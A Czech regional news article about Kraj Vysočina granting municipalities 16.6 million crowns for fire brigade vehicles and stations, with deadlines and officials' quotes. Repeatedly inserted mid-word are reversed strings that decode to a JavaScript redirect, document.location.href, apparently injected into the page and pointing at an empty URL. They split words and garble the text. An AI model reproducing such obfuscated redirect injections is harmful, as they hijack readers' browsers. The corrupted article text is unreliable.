Rainbow page separator

Obce mohou v únoru žádat o dotace na hasičské vybavení

Sobota, 23. ledna 2016

Sbor dobrovolných hasičů Sněžné

Žďársko / Podporu ve výši 16,6 milionu korun hodlá le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos poskytnout Kraj Vysočina obcím na modernizaci a vybavení jednotek jejich sborů dobrovolných hasičů. Začátkem února [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to schválí krajští zastupitelé.
Společně s dotačním titulem ministerstva vnitra – generálním ředitelstvím Hasičského záchranného sboru ČR tak kraj pomůže obcím dofinancovat projekty, na které stát na Vysočinu pošle 25 milionů. „Novou dotaci, která má pomoci s nákupem au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů a s výstavbou a rekonstrukcí požárních zbrojnic, budou moci obce čerpat už le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos. Kraj je připraven přispět obcím příspěvkem ve výši dvou třetin přiznané ministerské dotace,“ uvedl hejtman Kraje Vysočina Jiří Běhounek.
Obce budou o dotaci na rok 2017 a další léta žádat vždy k 30. dubnu přecházejícího roku. Generální ředitelství hasičského sboru i kraj však mají zájem dotační peníze vyplatit už le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos, takže uzávěrka pro rok 2016 je stanovena na konec února. „Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že obce budou v roce 2016 předkládat žádosti dvakrát – na rok 2016 a na rok 2017, avizoval hasičský sbor, že první vyplácení dotací bude zejména na pořízení au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů, po kterých je u obcí poptávka nejvyšší,“ doplnil náměstek hejtmana Kraje Vysočina pro oblast financí Vladimír Novotný.
V rozpočtu kraje na rok 2016 je pro hasičské sbory počítáno s částkou 7,5 milionu korun. Jde o stejnou sumu jako v předchozích letech, navíc k ní bude po schválení zastupitelstvem kraje přičteno již zmíněných 16,6 milionu.